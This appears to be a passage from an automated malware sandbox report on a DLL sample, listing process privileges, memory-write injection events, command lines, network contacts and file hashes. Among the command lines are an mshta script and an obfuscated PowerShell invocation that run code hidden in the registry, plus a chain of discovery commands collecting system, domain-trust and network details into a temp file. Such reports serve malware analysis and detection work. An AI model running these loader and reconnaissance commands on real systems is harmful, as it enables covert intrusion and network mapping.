Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3256 wrote to memory of 4540 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3256 wrote to memory of 4540 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3256 wrote to memory of 4540 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2952 wrote to memory of 4380 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 4380 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4380 wrote to memory of 864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4380 wrote to memory of 864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 864 wrote to memory of 3588 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 864 wrote to memory of 3588 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4380 wrote to memory of 3228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4380 wrote to memory of 3228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3228 wrote to memory of 4068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3228 wrote to memory of 4068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4380 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4380 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4380 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4380 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3116 wrote to memory of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 wrote to memory of 4244 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4244 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4244 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4244 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4244 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4244 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3116 wrote to memory of 4344 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4344 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4208 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4208 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4208 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4208 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3116 wrote to memory of 1092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 1092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 832 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 832 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 832 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 832 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3116 wrote to memory of 4600 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4600 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 556 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 556 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 556 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 556 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3116 wrote to memory of 5052 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 5052 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4296 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 4296 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4296 wrote to memory of 3224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lp3h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lp3h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name muwvla -value gp; new-alias -name pimbks -value iex; pimbks ([System.Text.Encoding]::ASCII.GetString((muwvla "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES256A.tmp" "c:\Users\Admin\AppData\Local\Temp\xr5mce2s\CSC1396718FD4E48259285D1476762AD99.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2683.tmp" "c:\Users\Admin\AppData\Local\Temp\accmwzpw\CSCFFAEDFB65E064C8FA99B587AB452037.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\343A.bin1 > C:\Users\Admin\AppData\Local\Temp\343A.bin & del C:\Users\Admin\AppData\Local\Temp\343A.bin1"

Network

Country Destination Domain Proto
US 8.238.21.254:80 tcp
US 8.238.21.254:80 tcp
US 8.238.21.254:80 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
FR 2.18.109.224:443 tcp
NL 178.79.208.1:80 tcp
NL 178.79.208.1:80 tcp
RO 37.120.206.71:80 37.120.206.71 tcp
US 8.8.8.8:53 164.2.77.40.in-addr.arpa udp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
US 8.8.8.8:53 9.9.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.3.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa udp

Files

memory/4540-130-0x0000000000000000-mapping.dmp

memory/4540-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/4540-136-0x0000000000BE0000-0x0000000000BED000-memory.dmp

memory/4380-140-0x0000000000000000-mapping.dmp

memory/4380-141-0x000001F2D6B20000-0x000001F2D6B42000-memory.dmp

memory/4380-142-0x00007FF8D9E80000-0x00007FF8DA941000-memory.dmp

memory/864-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.cmdline

MD5 e2bc0cd94a1905450fe7c4665accfbe0
SHA1 5a71da3c6bea5105bb934594b7f0bf41f31bd30f
SHA256 5b67365b0f494a631fcd9560ff30c6e793cec9ad9553762c9c5761e998aa94c9
SHA512 759d5cd8f05fac682d45f5ed8141bd2a4a441d5b4cf2f09afed20cb3f6d9a7fdbff3e628307cceaa47ef124a499d9f3d616130bd3354d238b0d7b9b66dca7a26

\??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/3588-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\CSC1396718FD4E48259285D1476762AD99.TMP

MD5 76bd946bba0aaa6c3953f08a7a52873c
SHA1 de1d778b2548b3a67fc6b430ca286a5ae07d3020
SHA256 0c535950015294e9f36f037b13c76d45f7aa6cf7319b52718c4323e7b5d55641
SHA512 0ce5d8ef4686b7273301cdfcc2229a0bcd00a996d3172e3c4032de042f4fad6b9d76515dcf7ad74236d7e248fdf9c043d39b776551db7ad3515a0613884c9787

C:\Users\Admin\AppData\Local\Temp\RES256A.tmp

MD5 c61bb66419dd65cf5ad9f747f26d4db4
SHA1 1837614b7a0b5f461fe28b2ba755e535a21c2996
SHA256 f3f58e80271e86370440a5851d1b4edea44b5eea4a4e758452bee2f850bbb0ae
SHA512 af87507594158784b4bdcb549b50376120e5b8e4e756267752bd6b3750ba773424bec60870058becfe74ec13fa38043ee26846afe90944b018b538b9dfe268b3

C:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.dll

MD5 bcb55518005d3f22cc8b6f9c1f9462b1
SHA1 b853cc5e1f68fa59e272197923c92cd2e2e69405
SHA256 e3b73c85f38115f41b56be783d4452b0932c026b535cefd6562d8737c190cba9
SHA512 5732aa781fe02d9e2f09a50d962a0a932d325ea3fc86f31cdfe6a937ac1bb88bb5c364142f849d7e6b82db7e2ed520b1bf9f81d6887407c7fd5f9f4d8215bc32

memory/3228-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.cmdline

MD5 beba16e59f02318fd5747b8d7be8ec2f
SHA1 5c9a49f37d0f4e296364c45358c9e51be664e9cc
SHA256 ed4a7645909f7cda9edce8a4f3d75bdde28f2ab0e314c71390207c00918c1271
SHA512 f65cdbd3ba37ff1860bc5531ff815a2859b93c52a64b47e7215d3926b3fbedbbbf3077efbab028dbcefb52cc6da85d3097b293c714893635d280fb0a7834fd9e

\??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/4068-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\CSCFFAEDFB65E064C8FA99B587AB452037.TMP

MD5 c1acc698bdec8241f5b0e61fa805b79c
SHA1 4cc0b5f5f6413d4ccca23fd8584239ffac44b881
SHA256 eae014f0f50d027fbf549bc41ce9e0c674488c1c8fee8120034e6343807dff60
SHA512 3448bfdc44384fecc3fe056c3e9b79d76eb52605634414a2a2327eed62056416687e341e075a3ed7334d666edb2c990835aa2641c7a07978ebf83d0fc9b5b53c

C:\Users\Admin\AppData\Local\Temp\RES2683.tmp

MD5 4c9e24c8ad5b4da6b1ffc13bce37b3c7
SHA1 71e51eb055b3a43666eba00d6f16d67534ee6c77
SHA256 b9682cfee63e97bbef9a43d5029d79b8e69c4a1667b48e852ffe9d3778167175
SHA512 69b2885d5ab9258310ee707de32d57e5ffe962ead72df23732ad532048437bf4972faa0148176970b60a5d86027add8f253dd610203d86b19aa1dedacb9e0df0

C:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.dll

MD5 f39620c5773a3b2aa5d5befdd2c31124
SHA1 0aeab41edec2c360b2438dcdf95e3830a9149aef
SHA256 be17263265fd35655c213e23f29959df22b6d5357b54c435b66a9047459c9322
SHA512 ff6e19217b79b841da43888b40b8df924c889c04311a3b20176417a2e0dfe6f8709ac242eeb0f9044f5cc87218233663b55c1fa619d384e3f1bc0f309c1a31c3

memory/4380-157-0x00007FF8D9E80000-0x00007FF8DA941000-memory.dmp

memory/4380-158-0x000001F2D6D00000-0x000001F2D6D3D000-memory.dmp

memory/3576-159-0x00000183FD920000-0x00000183FD9C3000-memory.dmp

memory/3116-160-0x0000000008120000-0x00000000081C3000-memory.dmp

memory/4244-161-0x0000000000000000-mapping.dmp

memory/1740-162-0x0000000000000000-mapping.dmp

memory/4188-163-0x0000000000000000-mapping.dmp

memory/2148-164-0x0000000000000000-mapping.dmp

memory/1740-165-0x0000000000786B20-0x0000000000786B24-memory.dmp

memory/1740-166-0x0000000000C70000-0x0000000000D06000-memory.dmp

memory/4344-167-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/4208-169-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3816-171-0x0000000000000000-mapping.dmp

memory/3828-172-0x0000017AAEB30000-0x0000017AAEBD3000-memory.dmp

memory/4552-173-0x000001BCBF400000-0x000001BCBF4A3000-memory.dmp

memory/3116-174-0x000000000D260000-0x000000000D39B000-memory.dmp

memory/3116-178-0x000000000D3A0000-0x000000000D4DA000-memory.dmp

memory/1092-182-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 92f52356fda8a51244df2c14828bd930
SHA1 335bedf66b420029da09eca8d9ed22cae93fdd64
SHA256 ba0aeb1efb309fe38822f7bb479a4ba9e8558b6a02a4129a21a9a960b81f0b69
SHA512 dbe7d8d2c0779995437e8c51e7b431593aa2678450da30b9cc97e527e2142f585d486b2c3056b210e4e2c84bd2a1d03588089a189ff29150b20b99c17744ad79

memory/832-184-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 7266e6c1b7501456d74c5ac4bcaf2352
SHA1 1aee2a2a73cb5371e126e907eeed12f2ce11e0a3
SHA256 dc0fb0044edd0389e9993b3c925f55309a38653131bf53fcb18dc9d93d8d6ac1
SHA512 4dc00e2a88e1b483ddc879e6da6adee83890f3691cd9842bfaf8d48eec0171361f2adccc24773bc2cabe58f9e70debdffc0730043be073c18d9ff9e4a2fb5f7b

memory/2152-186-0x0000000000000000-mapping.dmp

memory/3116-187-0x0000000008120000-0x00000000081C3000-memory.dmp

memory/4600-188-0x0000000000000000-mapping.dmp

memory/556-189-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 837de7e11db720fff66b7f7181271c0f
SHA1 856a8ae5bde24ce4b8f0c27b62222e355165c4b8
SHA256 249ec97ae002bdfea9b65ba8e1e0644db23ba5e0a2f312659446ac53c71bb852
SHA512 17ea0edf2b4342310c28e097eaf4a4df31bee807d2a75c196d5f299a060dfa17e152e6f03cc23262fdea3e413bc12412dab62cd563b16d1210dc9e07b7f6e04e

memory/2708-191-0x0000000000000000-mapping.dmp

memory/5052-192-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 a270d63c9c2ce75338beadd46651e418
SHA1 78d67614545c3bfa349fb671d45a0cce2ae134b7
SHA256 1a606937fdabcc8d148b3319e8f515f0d204e0d4380045daf93f55967b3cfebc
SHA512 e44bb6aedc4fa8c87e1d654ae0aaf33618a5867c99dfaa8f40a64c6217bdbe554faa6aa804785aa706cf40f19f9291feb2af40ab283c6990da1d7b8c64a5de99

memory/4296-194-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 a270d63c9c2ce75338beadd46651e418
SHA1 78d67614545c3bfa349fb671d45a0cce2ae134b7
SHA256 1a606937fdabcc8d148b3319e8f515f0d204e0d4380045daf93f55967b3cfebc
SHA512 e44bb6aedc4fa8c87e1d654ae0aaf33618a5867c99dfaa8f40a64c6217bdbe554faa6aa804785aa706cf40f19f9291feb2af40ab283c6990da1d7b8c64a5de99

memory/3224-196-0x0000000000000000-mapping.dmp

memory/2916-197-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\343A.bin1

MD5 3459e1fc227fcaa6fad8dc2e10d84fd2
SHA1 bb30b7d6ee1d2d258dbeee48b1a824d12209fbe9
SHA256 11dab6c92b5a465fd9f6c2ef2edec77a5831f20cdca9534c2c34aadddf48924d
